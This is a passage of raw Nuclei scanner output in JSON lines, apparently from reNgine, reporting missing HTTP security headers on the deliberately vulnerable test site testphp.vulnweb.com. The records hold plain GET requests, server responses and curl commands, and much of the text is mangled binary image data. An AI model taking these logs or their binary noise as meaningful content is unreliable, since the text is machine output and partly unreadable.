1\\ufffd+s\\ufffd\\ufffd2\\u0006pO\\ufffd\\ufffd*\\ufffd9.\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd=R\\ufffdd\\u003c\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\u001f\\ufffd\\ufffdl\\ufffd\\ufffd\\ufffd\\u000f\\ufffdț,\\u0008e\\u0000\\ufffdq\\ufffd8$v\\ufffd\\u003cg\\ufffd\\u0017\\ufffdy\\ufffd\\ufffd\\ufffdM\\ufffdҭ\\ufffd./\\ufffd`N@P\\u0019\\ufffd\\u0004\\ufffd\\u00120q\\ufffdۃ\\ufffdv\\u0016\\u001b\\ufffd\\\"\\ufffd\\ufffdŤv2q\\ufffd\\ufffd\\ufffdѩ\\ufffd\\ufffd\\u001eI(\\ufffd\\ufffdez\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd$\\ufffd(?ju\\u0015\\ufffdۨ\\ufffd~iʠS\\ufffd\\ufffdȺ\\u0001 \\ufffdRJŁ\\u0026\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\u0005\\u0001:\\u000b\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003eU\\ufffd\\ufffd\\ufffdߐFA\\u001eA\\\"\\ufffd\\ufffdD\\ufffdV}C\\ufffd\\ufffd\\ufffd\\u0005\\u000c\\ufffd\\ufffd\\ufffdwo'\\ufffd\\ufffd\\u0019'i\\ufffdT\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffdCE֯\\ufffd[\\ufffdu\\ufffdʊ\\ufffd\\ufffd\\ufffdH\\ufffdш\\ufffdq\\ufffd\\u0016\\\\\\ufffd\\u001c3\\u000c\\ufffdj\\u001fX\\ufffd;|\\u003c,6p\\ufffd|\\ufffd\\ufffd\\ufffdON\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdWf\\ufffdڰ.\\ufffdVu \\u0015\\ufffd\\u0006\\u0016@G\\ufffd9\\u003c\\u001e\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGiz\\ufffdŔ:\\ufffd\\ufffdۥ\\ufffd\\ufffd\\ufffdT\\ufffd\\ufffdh\\ufffd\\ufffdz\\ufffd\\ufffd\\u0006=\\ufffdvFs\\ufffdr\\t\\ufffd4\\ufffds^\\ufffd7\\ufffd\\ufffdÝ\\ufffd\\u0011\\ufffdFW\\ufffd\\ufffd\\u003eT\\ufffd\\u000ct\\ufffdV$\\ufffd\\ufffdO\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\u0013\\u0008cc#M\\u0004\\ufffd\\u0019W\\ufffd\\ufffd\\ufffd\\ufffdGܮ\\u001c\\ufffd\\ufffd\\n~r(i\\ufffd\\ufffdjw\\u0006\\u0018Z\\u003c\\ufffd/\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffdx\\u0007\\u0004\\ufffdb21\\ufffd\\ufffdm\\ufffdu\\ufffdXZ\\ufffd*\\ufffdFھ\\ufffd\\ufffd\\u0000ҰEM\\ufffd\\ufffd$*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffdD}\\ufffd\\ufffdRzE\\u0003\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\u001a\\ufffd{\\ufffd0\\ufffd\\ufffd\\ufffds\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd(\\ufffd\\ufffdך\\ufffd\\u00063ڢ\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd\\\"\\ufffd(\\ufffd\\u0008\\ufffd\\ufffd(Bl\\ufffdmEE\\u0015Ġ\\ufffd\\u0006\\ufffd'=袄\\ufffd\\ufffd\\ufffd\\u000e\\ufffdw\\ufffdj\\ufffdwd\\ufffd:\\ufffdY\\u0018e%O(\\ufffdʜv\\ufffd\\u00020@5\\ufffd:\\ufffd6WWqDIX\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffdE\\u0015\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffdߴ\\ufffd+m6\\ufffd\\ufffde\\nč#;rX\\ufffd\\u001e\\ufffdI$\\ufffd\\ufffdw\\ufffd\\u0000\\u0006\\u0000\\ufffd\\\\0\\u0017\\ufffd7\\ufffd\\ufffdU\\u0003\\r\\u0018\\u000b\\ufffd\\ufffd\\u0011\\ufffd\\ufffd9\\u0018\\ufffd\\u0004w\\ufffd\\u003c`\\ufffd\\ufffdȾ$\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffdrțö\\u003e\\ufffdW\\ufffd\\ufffd\\u0013\\ufffdO.\\ufffd=\\ufffdП\\ufffd.\\ufffd\\u0004\\u0001\\ufffd\\ufffdc\\ufffdY!\\n\\ufffd\\ufffdWv\\ufffdv\\ufffd\\u0019e\\u0007\\ufffd\\u0015\\ufffd\\ufffdf\\ufffd\\ufffdӧ\\ufffd\\ufffdmn\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ݑ\\ufffd؁\\ufffd\\ufffd\\u003c`\\ufffd\\ufffd(\\ufffd:\\ufffd\\u0000\\ufffd\\u000f\\ufffdL\\ufffdOd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdigw|\\ufffd\\ufffd)\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u00078\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffd98\\ufffd@\\ufffdE\\u0015\\u0017\\ufffd1\\ufffd\\ufffd\\ufffdE\\ufffd\\u001f`\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\ufffd}\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:58.811847868Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:59.314194373Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin\",\"path\":\"/cgi-bin\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin\",\"request\":\"GET /cgi-bin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eForbidden\\u003c/h1\\u003e\\n\\u003cp\\u003eYou don't have permission to access this resource.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:59.314296423Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"path\":\"/pictures/2.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"request\":\"GET /pictures/2.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1353\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-549\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001a\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0001\\u0003\\u0004\\u0005\\u0006\\ufffd\\ufffd\\u0000+\\u0010\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0000\\u0004\\u0007\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1AQ\\\"a\\u00142q\\ufffd\\u0005\\u0013$B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003\\u0001\\u0002\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000'\\u0011\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0001\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1\\u0005Q\\u00132A\\\"#3aq\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffd\\ufffdd\\ufffdH䏺JU\\ufffd\\t\\u000f\\u0008\\ufffdi{\\u0015+f\\ufffd.7\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB6\\ufffd˨\\ufffd\\ufffd\\ufffd\\ufffd͒\\u001bdס\\u001a\\ufffdi\\ufffdE\\ufffdn\\ufffd_\\ufffd\\ufffd%\\u001atN\\u000c\\ufffdpR\\ufffdH\\u001d\\ufffd,֝\\ufffd\\u0000\\u0001 \\u0014\\u0000@'DQ\\u0003\\u0000Qu?b\\ufffd-\\u0010\\u0005\\ufffdL\\u0000\\u0000\\t\\u0000\\u0000\\u0000-\\u0005\\ufffd\\u0001\\ufffd\\ufffd\\u000cH\\ufffd'A\\u0015F\\ufffd\\u001a\\ufffdʔ?z3G\\ufffd^\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdK\\ufffd)\\ufffdۓ\\ufffdl\\ufffd%\\ufffd\\ufffd\\\"䨤\\ufffd\\u001f\\ufffdu\\u0015Ed44\\ufffd2\\u0005\\ufffdS\\ufffdD\\u0002Y\\u0005F\\ufffd`\\u0000\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\r\\u0011L`\\\"\\ufffd)4(\\u000cF\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003%C\\ufffd9\\ufffd\\ufffd1F\\ufffd$\\ufffdc$\\ufffd\\ufffd\\u000f\\ufffd~\\ufffdQ_\\ufffdק{c'K\\ufffd#\\ufffd\\ufffdr|\\ufffdR\\ufffd\\ufffd(\\ufffdԤ\\ufffdI}#;\\ufffd\\ufffdk\\ufffdʚ\\ufffd\\ufffdϳf\\ufffd\\ufffd\\ufffdEmZ\\u0010\\ufffd\\ufffd\\u0012Kȶ\\ufffdА\\ufffd\\ufffdC\\u0001Z\\u001a\\ufffdB\\u0000\\ufffd\\u0006Ҵ1I\\n\\u0004\\ufffd\\u0000X\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ufffd\\u001com\\ufffd\\u0004\\ufffd,\\ufffd7\\u000e\\ufffd}\\ufffd\\\\1\\ufffd,\\ufffd\\u001f\\u0017\\ufffd\\ufffd#\\ufffdwG\\ufffdϫ\\ufffd\\u0016\\ufffd\\ufffd\\ufffddPf\\ufffd\\u003c\\u0013\\ufffdK\\ufffd\\ufffdG\\ufffd4j\\ufffd\\ufffd\\u001c\\ufffdi\\ufffd$\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffdj\\ufffd4C\\u000b\\ufffd\\ufffd\\ufffdg\\ufffd8\\ufffd`\\ufffd.\\ufffdΜy)\\ufffdN\\ufffd\\ufffd?\\ufffd\\ufffdj\\ufffd\\ufffd\\u001a\\ufffd*\\ufffdw\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd),\\u0012\\ufffd5b\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdg%\\ufffd\\ufffd[7e\\ufffdb\\ufffd\\u001a\\ufffd\\u0000/\\ufffd$\\ufffdfiƎ֛3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdХ\\ufffd5b\\ufffdޥ\\ufffd@%Ţ\\u0008\\u0019v\\u0000\\u0000\\u0000\\u0014E\\u0012\\u0000M\\ufffd(\\ufffd\\u0018\\u0008\\ufffdw1h\\ufffd\\ufffd(\\ufffd\\ufffd\\ufffd\\u001e\\u001a7\\ufffd\\ufffdC\\u001c\\ufffd\\ufffd\\ufffd_\\ufffd\\u000c{,\\ufffd\\ufffdَ[]\\ufffd\\ufffdkp\\ufffd\\ufffdp}\\u001d?ĹI\\ufffd\\ufffd'\\ufffd\\u0026\\ufffdjq\\ufffd\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdWO\\ufffd\\ufffd\\ufffd\\ufffdkV\\ufffd\\ufffd\\ufffd}\\u001bq\\ufffd|\\ufffdc]\\ufffdq5\\u0018\\ufffd\\ufffdp\\u0013\\ufffdJ\\ufffd\\u00003\\ufffd\\ufffd]Fhe\\ufffd\\u0018\\ufffd\\ufffdK\\ufffd4\\ufffd%r}\\ufffd\\ufffdW\\ufffd\\ufffdà\\ufffd\\ufffdd\\ufffdh\\ufffd}\\ufffd\\ufffd-\\ufffd\\\\\\ufffd\\ufffd\\u001c\\ufffdE\\ufffd\\ufffd+B\\ufffd+^\\ufffd4j\\ufffd\\ufffd\\u0004\\u0010\\ufffd}\\ufffd\\u0004\\u000cN\\ufffdqb\\ufffd\\u0000Qe?e`6\\ufffd\\u001b~Ȣې\\ufffd6߲v\\ufffd\\ufffd܄\\u0026\\ufffd\\ufffd\\u0014C\\ufffd\\ufffdJ\\ufffdx\\ufffd\\n\\u003enjlԑ\\ufffd\\ufffd5CEY\\ufffd3\\ufffd\\ufffdj=\\ufffd\\nʱ\\ufffd\\ufffdեj\\ufffdб\\ufffd\\u0000N\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffdp\\ufffd\\ufffd\\ufffdk3\\ufffd\\ufffdҾ\\ufffd9\\ufffd\\ufffd\\ufffd}3t\\ufffd\\ufffd\\ufffdψ\\ufffd2J4\\ufffdN\\rvt\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003e\\ufffdq\\ufffd%\\ufffd\\ufffd\\t\\ufffd\\ufffd\\u001fB\\ufffd\\ufffde\\ufffd\\u001bJ\\ufffd\\u001e\\ufffdQM\\\"(\\ufffd»^,]\\ufffde\\\\FG2k\\ufffdWAC\\ufffd\\r\\ufffd\\ufffd.\\ufffdbPQf\\ufffd\\ufffd\\ufffdt[^\\tP\\ufffd\\ufffdΣ\\ufffd(\\ufffd\\ufffd\\ufffd\\u00126\\ufffd6\\ufffdYlJ\\u0026\\ufffd\\ufffd\\ufffdI\\u0013D\\u003c\\ufffd\\ufffd\\ufffdd\\u0017 \\u0006\\ufffd\\ufffdp2\\ufffd\\u000e\\ufffd\\ufffdm%\\u000e6\\ufffd\\ufffd\\ufffduc\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd}\\ufffd\\ufffd\\u0000\\u001dl*⏝y\\ufffdJ\\u0019\\ufffdK\\ufffdNn\\ufffdN\\u0012x\\ufffd䋤rr%`\\u0006-W\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffdEd(\\ufffd\\u0003!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP\\ufffd8\\ufffd\\ufffdk\\ufffd\\ufffd\\u0005)\\ufffd?,\\u0000+\\ufffd\\ufffd\\ufffd;5\\u0012\\ufffd\\u000c2\\ufffd\\ufffd\\ufffd+\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u0000e\\ufffd2\\ufffd\\t7\\ufffd6-\\\"v\\ufffd\\u0001f\\ufffdd\\ufffd\\u0026ͺXA\\ufffd\\ufffd\\ufffdSh\\u0000~\\ufffd\\\\\\ufffdW\\ufffd\\ufffd\\ufffd%O\\ufffd\\ufffdr\\ufffd\\ufffdc\\u0014\\ufffd\\u0004\\u003eΌ\\u001b\\ufffdCHe\\u0014\\u0000\\u0008\\ufffd\\ufffd\\u0007\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:59.314325782Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"request\":\"GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:59.958507052Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:59.958564772Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can 